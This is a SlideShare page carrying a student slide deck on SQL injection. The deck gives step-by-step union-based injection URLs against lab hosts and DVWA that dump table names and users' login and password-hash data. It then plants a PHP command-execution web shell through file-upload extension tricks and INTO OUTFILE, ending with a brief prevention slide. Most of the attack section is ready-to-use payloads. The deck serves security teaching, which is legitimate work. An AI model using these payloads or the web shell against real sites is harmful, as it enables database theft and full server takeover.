SlideShare a Scribd company logo

Web hacking series part 3

Download as pptx, pdf
A
Aditya Kamat

This document provides an overview of SQL injection techniques. It discusses bypassing authentication via SQL injection, uploading shells to gain remote code execution, and prevention methods. Specific techniques covered include determining the number of columns, dumping table names and column names, extracting data like usernames and passwords, and uploading a PHP shell using UNION queries and INTO OUTFILE to execute remote commands on the server. Examples are provided using Burp Suite to exploit vulnerabilities on demo sites.

1 of 30
Downloaded 10 times
~ Aditya Kamat BMS College of Engineering WEB HACKING SERIES PART-3
TOPICS LEARNT TILL NOW :-- • Basics of web and a little about networks. • HTML injection. • SQL injection to bypass authentication. • Buffer overflow attack.
CONT… • Bypass Authentication Via Authentication Token Manipulation. • Session hijacking. • Brute forcing login pages using burp. • HTTP parameter pollution.
WHAT WILL BE COVERED TODAY:- • SQL injection (Sqli). • Uploading a shell and gaining remote code execution capabilities on the server. • And the prevention of course.
WHAT IS SQL?? • Sequential Query Language is a language used to interact with the database. • We are allowed to ask questions in the form of queries and the answers are known as the results. • It’s syntax is very simple and similar to the natural language (English).
BASIC OPERATIONS ON A DATABASE:- • Create: Insert data into a database. • Read: Read data from a table in a database. • Update: Update some information present in a database. • Delete: Delete information from a database.
IMPORTANT SQL COMMANDS:- Source:w3schools.org
LET’S HAVE A LOOK AT AN EXAMPLE QUERY:- • Select * from colleges; • Assuming a table with the name “colleges” exist. • The result of the query will be all the rows of the table. • We can add a constraint with the keyword ‘where’. Example: select * from colleges where name=‘bmsce’; This selects the row which contains ‘bmsce’ in its name column.
STEPS FOR INJECTION:- • Search for a vulnerable point (injection point). • Check out the database used. • Inject queries to dump required data.
WHAT SHOULD WE FOCUS ON? • Normal query in websites to check for username and password of a user: select username,password from users where username=‘x’ and password=‘y’; • If the query returns a row or more, it means that the user is authentic. • To become the authenticated user, we need to bypass the password check by using ‘or 1=1— • ‘ is used to close the password acceptance string and or 1=1 returns true, thus authenticating the user.
LET’S START OFF WITH A DEMO!
EXAMPLE 1--
STEP 1: • Check if the site is vulnerable by adding a single quote at the end. • http://192.16856.100/cat.php?id=1'
STEP 2: • Check the number of columns present in the table used by the web page. • http://192.168.56.100/cat.php?id=1 order by 1 • http://192.168.56.100/cat.php?id=1 order by 2 • http://192.168.56.100/cat.php?id=1 order by 3 • http://192.168.56.100/cat.php?id=1 order by 4 • http://192.168.56.100/cat.php?id=1 order by 5 (We get an error here).
STEP 3: • Find out the vulnerable column which can be used to dump the data. • http://192.168.56.100/cat.php?id=-1 union select 1,2,3,4 • Union operator is used to combine the result of many select queries and it also removes duplicate rows. • The above query returns a number corresponding to a column which is vulnerable.
STEP 4 (NOT NECESSARY): • http://192.168.56.100/cat.php?id=-1 union select 1,@@version,3,4 • @@version return a string that indicates the MySQL server version • @@database returns the default (current) database name • @@user returns the user name and host name provided by the client.
STEP 5: • http://192.168.56.100/cat.php?id=-1 union select 1,table_name,3,4 from information_schema.tables • We retrieve all the tables present in the database. • Information_schema.tables consist of the names of all the tables present.
STEP 6: • http://192.168.56.100/cat.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name='users‘ • From the previous query, we choose the right table and find out all the columns present in it through this query. Here, we have chosen the table ‘users’
STEP 7: • http://192.168.56.100/cat.php?id=-1 union select 1,concat(id,0x3a,login,0x3a,password),3,4 from users • We dump the data present in users table. We need to specify the name of the columns from which the data is to be dumped. • 0x3a is the hex equivalent for ‘:’ . It is used to differentiate between the values from each column.
WHAT NEXT?? • We got to decode the password we obtained and use it to login as admin. • The password is in md5 hash format. It can be decoded to ‘P4ssw0rd’ using some online services. • Upload a shell and gain access to the web server.
UPLOADING A SHELL: • After gaining admin access, try finding a page which allows uploading of images/documents (/admin/new.php in our case). • Upload our simple php script to be able to pass system commands in the url. • Some website don’t allow you to upload a php file directly. Try changing the extensions to one of these: “Php, php3, pHp, phP, php.test” . • If none of these work, use tamper data to change the extension. • Last hope is to encode the php script into an image using exiftool and then upload the image.
EXAMPLE 2 (DVWA)
LET US TRY OUT THE SAME STEPS HERE TOO! • Try out steps 1 to 7 which was done in the previous example.
NEW WAY TO UPLOAD A SHELL:- • Using “INTO OUTFILE”, we can redirect a stream of text to a file. • Simple query we will use: http://192.168.56.100/hacks/DVWA- master/vulnerabilities/sqli/?id=' union select unhex(hex(""hi"")),2 INTO OUTFILE "C:xampphtdocshacksDVWA- mastertext.php"--+&Submit=Submit#
CONTD… • In this way, we can insert the php code we used in the previous example to be able to execute system commands. <?php system($_GET['cmd']); ?>
DONE!!! SRC:null-byte.wonderhowto.com
PREVENTION:- • Validate all user supplied input. • Use prepared statements. • Review code for all possible injection points. • Store important information in the form of salt+hash in the database. Ref:https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet
CONT… • Use a web application firewall. • Run RIPS scanner on PHP code. • Manage Database access accounts with right privileges.
ADDITIONAL RESOURCES:- • Try out more php shells at: r57shell.net • SQL injection tutorials at: https://www.youtube.com/watch?v=_Y8A-1GAUiY&list=PLMA3sO- IlLtuREVEaRX0s8d2WeUM0E4bE http://www.sqlinjection.net/ • Practice at: hackthissite.org • Practice VM : https://pentesterlab.com/exercises/from_sqli_to_shell/iso • DVWA: http://www.dvwa.co.uk/
THANK YOU

Recommended

Web Hacking Series Part 1
Web Hacking Series Part 1Web Hacking Series Part 1
Web Hacking Series Part 1
Aditya Kamat
 
Web Hacking series part 2
Web Hacking series part 2Web Hacking series part 2
Web Hacking series part 2
Aditya Kamat
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4
Aditya Kamat
 
Exploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shellExploiting a vulnerability to gain a shell
Exploiting a vulnerability to gain a shell
Aditya Kamat
 
Unicode
UnicodeUnicode
Unicode
Ronan Dunne, CEH, SSCP
 
Web application attack Presentation
Web application attack PresentationWeb application attack Presentation
Web application attack Presentation
Khoa Nguyen
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
Sam Bowne
 
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
CNIT 129S: 9: Attacking Data Stores (Part 2 of 2)
Sam Bowne
 
Error codes & custom 404s
Error codes & custom 404sError codes & custom 404s
Error codes & custom 404s
Ronan Dunne, CEH, SSCP
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
Blueinfy Solutions
 
Increase automation to rest
Increase automation to restIncrease automation to rest
Increase automation to rest
vodQA
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Rest API Testing
Rest API TestingRest API Testing
Rest API Testing
upadhyay_25
 
Automating and Testing a REST API
Automating and Testing a REST APIAutomating and Testing a REST API
Automating and Testing a REST API
Alan Richardson
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
Ahmed Sherif
 
Heuristics to scale your framework
Heuristics to scale your frameworkHeuristics to scale your framework
Heuristics to scale your framework
vodQA
 
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
Vivek Sinha Anurag
 
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable CodeMicrosoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Aleksandar Bozinovski
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
SQL INJECTIONS EVERY TESTER NEEDS TO KNOWSQL INJECTIONS EVERY TESTER NEEDS TO KNOW
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
Vladimir Arutin
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
n|u - The Open Security Community
 
SignalR
SignalR SignalR
SignalR
Sarvesh Kushwaha
 
Web application penetration using SQLMAP.
Web application penetration using SQLMAP.Web application penetration using SQLMAP.
Web application penetration using SQLMAP.
asmitaanpat
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
SQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen TestingSQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen Testing
191013607gouthamsric
 
Sqlmap
SqlmapSqlmap
Sqlmap
SiddharthWagh7
 

More Related Content

What's hot (20)

Error codes & custom 404s
Error codes & custom 404sError codes & custom 404s
Error codes & custom 404s
Ronan Dunne, CEH, SSCP
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
Blueinfy Solutions
 
Increase automation to rest
Increase automation to restIncrease automation to rest
Increase automation to rest
vodQA
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Rest API Testing
Rest API TestingRest API Testing
Rest API Testing
upadhyay_25
 
Automating and Testing a REST API
Automating and Testing a REST APIAutomating and Testing a REST API
Automating and Testing a REST API
Alan Richardson
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
Ahmed Sherif
 
Heuristics to scale your framework
Heuristics to scale your frameworkHeuristics to scale your framework
Heuristics to scale your framework
vodQA
 
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
Vivek Sinha Anurag
 
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable CodeMicrosoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Aleksandar Bozinovski
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
SQL INJECTIONS EVERY TESTER NEEDS TO KNOWSQL INJECTIONS EVERY TESTER NEEDS TO KNOW
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
Vladimir Arutin
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
n|u - The Open Security Community
 
SignalR
SignalR SignalR
SignalR
Sarvesh Kushwaha
 
Web application penetration using SQLMAP.
Web application penetration using SQLMAP.Web application penetration using SQLMAP.
Web application penetration using SQLMAP.
asmitaanpat
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 
Error codes & custom 404s
Error codes & custom 404sError codes & custom 404s
Error codes & custom 404s
Ronan Dunne, CEH, SSCP
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
Blueinfy Solutions
 
Increase automation to rest
Increase automation to restIncrease automation to rest
Increase automation to rest
vodQA
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Rest API Testing
Rest API TestingRest API Testing
Rest API Testing
upadhyay_25
 
Automating and Testing a REST API
Automating and Testing a REST APIAutomating and Testing a REST API
Automating and Testing a REST API
Alan Richardson
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and prevention
helloanand
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
Ahmed Sherif
 
Heuristics to scale your framework
Heuristics to scale your frameworkHeuristics to scale your framework
Heuristics to scale your framework
vodQA
 
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End ComponentsCNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
Vivek Sinha Anurag
 
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable CodeMicrosoft Fakes, Unit Testing the (almost) Untestable Code
Microsoft Fakes, Unit Testing the (almost) Untestable Code
Aleksandar Bozinovski
 
Hack proof your ASP NET Applications
Hack proof your ASP NET ApplicationsHack proof your ASP NET Applications
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
SongchaiDuangpan
 
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
SQL INJECTIONS EVERY TESTER NEEDS TO KNOWSQL INJECTIONS EVERY TESTER NEEDS TO KNOW
SQL INJECTIONS EVERY TESTER NEEDS TO KNOW
Vladimir Arutin
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
n|u - The Open Security Community
 
SignalR
SignalR SignalR
SignalR
Sarvesh Kushwaha
 
Web application penetration using SQLMAP.
Web application penetration using SQLMAP.Web application penetration using SQLMAP.
Web application penetration using SQLMAP.
asmitaanpat
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
Mike Crabb
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
Blueinfy Solutions
 

Similar to Web hacking series part 3 (20)

SQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen TestingSQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen Testing
191013607gouthamsric
 
Sqlmap
SqlmapSqlmap
Sqlmap
SiddharthWagh7
 
API-Testing-SOAPUI-1.pptx
API-Testing-SOAPUI-1.pptxAPI-Testing-SOAPUI-1.pptx
API-Testing-SOAPUI-1.pptx
amarnathdeo
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
beched
 
Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational Controls
Teamstudio
 
BTV PHP - Building Fast Websites
BTV PHP - Building Fast WebsitesBTV PHP - Building Fast Websites
BTV PHP - Building Fast Websites
Jonathan Klein
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
Shubham Takode
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
Scott Sutherland
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
G Prachi
 
Data-Analytics using python (Module 4).pptx
Data-Analytics using python (Module 4).pptxData-Analytics using python (Module 4).pptx
Data-Analytics using python (Module 4).pptx
DRSHk10
 
Ch 10: Attacking Back-End Components
Ch 10: Attacking Back-End ComponentsCh 10: Attacking Back-End Components
Ch 10: Attacking Back-End Components
Sam Bowne
 
Ch 13: Attacking Other Users: Other Techniques (Part 1)
Ch 13: Attacking Other Users: Other Techniques (Part 1)Ch 13: Attacking Other Users: Other Techniques (Part 1)
Ch 13: Attacking Other Users: Other Techniques (Part 1)
Sam Bowne
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
Web Services PHP Tutorial
Web Services PHP TutorialWeb Services PHP Tutorial
Web Services PHP Tutorial
Lorna Mitchell
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
newbie2019
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 
Download It
Download ItDownload It
Download It
webhostingguy
 
SQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen TestingSQL Injection Stegnography in Pen Testing
SQL Injection Stegnography in Pen Testing
191013607gouthamsric
 
Sqlmap
SqlmapSqlmap
Sqlmap
SiddharthWagh7
 
API-Testing-SOAPUI-1.pptx
API-Testing-SOAPUI-1.pptxAPI-Testing-SOAPUI-1.pptx
API-Testing-SOAPUI-1.pptx
amarnathdeo
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
beched
 
Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational Controls
Teamstudio
 
BTV PHP - Building Fast Websites
BTV PHP - Building Fast WebsitesBTV PHP - Building Fast Websites
BTV PHP - Building Fast Websites
Jonathan Klein
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Anoop T
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
Shubham Takode
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL
Scott Sutherland
 
Web application security part 01
Web application security part 01Web application security part 01
Web application security part 01
G Prachi
 
Data-Analytics using python (Module 4).pptx
Data-Analytics using python (Module 4).pptxData-Analytics using python (Module 4).pptx
Data-Analytics using python (Module 4).pptx
DRSHk10
 
Ch 10: Attacking Back-End Components
Ch 10: Attacking Back-End ComponentsCh 10: Attacking Back-End Components
Ch 10: Attacking Back-End Components
Sam Bowne
 
Ch 13: Attacking Other Users: Other Techniques (Part 1)
Ch 13: Attacking Other Users: Other Techniques (Part 1)Ch 13: Attacking Other Users: Other Techniques (Part 1)
Ch 13: Attacking Other Users: Other Techniques (Part 1)
Sam Bowne
 
SQL Injection Defense in Python
SQL Injection Defense in PythonSQL Injection Defense in Python
SQL Injection Defense in Python
Public Broadcasting Service
 
Web Services PHP Tutorial
Web Services PHP TutorialWeb Services PHP Tutorial
Web Services PHP Tutorial
Lorna Mitchell
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
newbie2019
 
Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017Invoke-Obfuscation nullcon 2017
Invoke-Obfuscation nullcon 2017
Daniel Bohannon
 
Download It
Download ItDownload It
Download It
webhostingguy
 

Recently uploaded (20)

accessibility Considerations during Design by Rick Blair, Schneider Electric
accessibility Considerations during Design by Rick Blair, Schneider Electricaccessibility Considerations during Design by Rick Blair, Schneider Electric
accessibility Considerations during Design by Rick Blair, Schneider Electric
UXPA Boston
 
Top 5 Qualities to Look for in Salesforce Partners in 2025
Top 5 Qualities to Look for in Salesforce Partners in 2025Top 5 Qualities to Look for in Salesforce Partners in 2025
Top 5 Qualities to Look for in Salesforce Partners in 2025
Damco Salesforce Services
 
AI-proof your career by Olivier Vroom and David WIlliamson
AI-proof your career by Olivier Vroom and David WIlliamsonAI-proof your career by Olivier Vroom and David WIlliamson
AI-proof your career by Olivier Vroom and David WIlliamson
UXPA Boston
 
Kit-Works Team Study_아직도 Dockefile.pdf_김성호
Kit-Works Team Study_아직도 Dockefile.pdf_김성호Kit-Works Team Study_아직도 Dockefile.pdf_김성호
Kit-Works Team Study_아직도 Dockefile.pdf_김성호
Wonjun Hwang
 
Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...
Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...
Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...
Maarten Verwaest
 
Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?
Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?
Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?
Christian Folini
 
Cybersecurity Tools and Technologies - Microsoft Certificate
Cybersecurity Tools and Technologies - Microsoft CertificateCybersecurity Tools and Technologies - Microsoft Certificate
Cybersecurity Tools and Technologies - Microsoft Certificate
VICTOR MAESTRE RAMIREZ
 
May Patch Tuesday
May Patch TuesdayMay Patch Tuesday
May Patch Tuesday
Ivanti
 
Computer Systems Quiz Presentation in Purple Bold Style (4).pdf
Computer Systems Quiz Presentation in Purple Bold Style (4).pdfComputer Systems Quiz Presentation in Purple Bold Style (4).pdf
Computer Systems Quiz Presentation in Purple Bold Style (4).pdf
fizarcse
 
Refactoring meta-rauc-community: Cleaner Code, Better Maintenance, More Machines
Refactoring meta-rauc-community: Cleaner Code, Better Maintenance, More MachinesRefactoring meta-rauc-community: Cleaner Code, Better Maintenance, More Machines
Refactoring meta-rauc-community: Cleaner Code, Better Maintenance, More Machines
Leon Anavi
 
Mastering Testing in the Modern F&B Landscape
Mastering Testing in the Modern F&B LandscapeMastering Testing in the Modern F&B Landscape
Mastering Testing in the Modern F&B Landscape
marketing943205
 
AI and Gender: Decoding the Sociological Impact
AI and Gender: Decoding the Sociological ImpactAI and Gender: Decoding the Sociological Impact
AI and Gender: Decoding the Sociological Impact
SaikatBasu37
 
Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...
Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...
Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...
Safe Software
 
machines-for-woodworking-shops-en-compressed.pdf
machines-for-woodworking-shops-en-compressed.pdfmachines-for-woodworking-shops-en-compressed.pdf
machines-for-woodworking-shops-en-compressed.pdf
AmirStern2
 
In-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptx
In-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptxIn-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptx
In-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptx
aptyai
 
Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)
Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)
Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)
HusseinMalikMammadli
 
UiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptx
UiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptxUiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptx
UiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptx
anabulhac
 
ICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdf
ICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdfICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdf
ICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdf
Eryk Budi Pratama
 
Building the Customer Identity Community, Together.pdf
Building the Customer Identity Community, Together.pdfBuilding the Customer Identity Community, Together.pdf
Building the Customer Identity Community, Together.pdf
Cheryl Hung
 
How Top Companies Benefit from Outsourcing
How Top Companies Benefit from OutsourcingHow Top Companies Benefit from Outsourcing
How Top Companies Benefit from Outsourcing
Nascenture
 
accessibility Considerations during Design by Rick Blair, Schneider Electric
accessibility Considerations during Design by Rick Blair, Schneider Electricaccessibility Considerations during Design by Rick Blair, Schneider Electric
accessibility Considerations during Design by Rick Blair, Schneider Electric
UXPA Boston
 
Top 5 Qualities to Look for in Salesforce Partners in 2025
Top 5 Qualities to Look for in Salesforce Partners in 2025Top 5 Qualities to Look for in Salesforce Partners in 2025
Top 5 Qualities to Look for in Salesforce Partners in 2025
Damco Salesforce Services
 
AI-proof your career by Olivier Vroom and David WIlliamson
AI-proof your career by Olivier Vroom and David WIlliamsonAI-proof your career by Olivier Vroom and David WIlliamson
AI-proof your career by Olivier Vroom and David WIlliamson
UXPA Boston
 
Kit-Works Team Study_아직도 Dockefile.pdf_김성호
Kit-Works Team Study_아직도 Dockefile.pdf_김성호Kit-Works Team Study_아직도 Dockefile.pdf_김성호
Kit-Works Team Study_아직도 Dockefile.pdf_김성호
Wonjun Hwang
 
Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...
Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...
Limecraft Webinar - 2025.3 release, featuring Content Delivery, Graphic Conte...
Maarten Verwaest
 
Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?
Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?
Crazy Incentives and How They Kill Security. How Do You Turn the Wheel?
Christian Folini
 
Cybersecurity Tools and Technologies - Microsoft Certificate
Cybersecurity Tools and Technologies - Microsoft CertificateCybersecurity Tools and Technologies - Microsoft Certificate
Cybersecurity Tools and Technologies - Microsoft Certificate
VICTOR MAESTRE RAMIREZ
 
May Patch Tuesday
May Patch TuesdayMay Patch Tuesday
May Patch Tuesday
Ivanti
 
Computer Systems Quiz Presentation in Purple Bold Style (4).pdf
Computer Systems Quiz Presentation in Purple Bold Style (4).pdfComputer Systems Quiz Presentation in Purple Bold Style (4).pdf
Computer Systems Quiz Presentation in Purple Bold Style (4).pdf
fizarcse
 
Refactoring meta-rauc-community: Cleaner Code, Better Maintenance, More Machines
Refactoring meta-rauc-community: Cleaner Code, Better Maintenance, More MachinesRefactoring meta-rauc-community: Cleaner Code, Better Maintenance, More Machines
Refactoring meta-rauc-community: Cleaner Code, Better Maintenance, More Machines
Leon Anavi
 
Mastering Testing in the Modern F&B Landscape
Mastering Testing in the Modern F&B LandscapeMastering Testing in the Modern F&B Landscape
Mastering Testing in the Modern F&B Landscape
marketing943205
 
AI and Gender: Decoding the Sociological Impact
AI and Gender: Decoding the Sociological ImpactAI and Gender: Decoding the Sociological Impact
AI and Gender: Decoding the Sociological Impact
SaikatBasu37
 
Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...
Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...
Integrating FME with Python: Tips, Demos, and Best Practices for Powerful Aut...
Safe Software
 
machines-for-woodworking-shops-en-compressed.pdf
machines-for-woodworking-shops-en-compressed.pdfmachines-for-woodworking-shops-en-compressed.pdf
machines-for-woodworking-shops-en-compressed.pdf
AmirStern2
 
In-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptx
In-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptxIn-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptx
In-App Guidance_ Save Enterprises Millions in Training & IT Costs.pptx
aptyai
 
Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)
Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)
Multi-Agent AI Systems: Architectures & Communication (MCP and A2A)
HusseinMalikMammadli
 
UiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptx
UiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptxUiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptx
UiPath AgentHack - Build the AI agents of tomorrow_Enablement 1.pptx
anabulhac
 
ICDCC 2025: Securing Agentic AI - Eryk Budi Pratama.pdf
